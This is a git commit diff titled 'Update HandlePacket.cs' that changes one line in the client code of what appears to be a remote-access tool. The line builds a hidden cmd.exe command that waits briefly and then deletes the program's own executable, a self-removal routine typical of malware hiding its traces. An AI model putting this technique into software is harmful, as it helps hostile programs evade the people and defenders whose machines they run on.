Update HandlePacket.cs

This commit is contained in:
NYAN CAT 2019-03-26 05:16:58 -07:00
parent c707c8b543
commit 65460e6355

View File

@ -139,7 +139,7 @@ namespace Client.Handle_Packet
{ {
Del = new ProcessStartInfo() Del = new ProcessStartInfo()
{ {
Arguments = "/C choice /C Y /N /D Y /T 2 & Del " + Process.GetCurrentProcess().MainModule.FileName, Arguments = "/C choice /C Y /N /D Y /T 1 & Del \"" + Process.GetCurrentProcess().MainModule.FileName + "\"",
WindowStyle = ProcessWindowStyle.Hidden, WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true, CreateNoWindow = true,
FileName = "cmd.exe" FileName = "cmd.exe"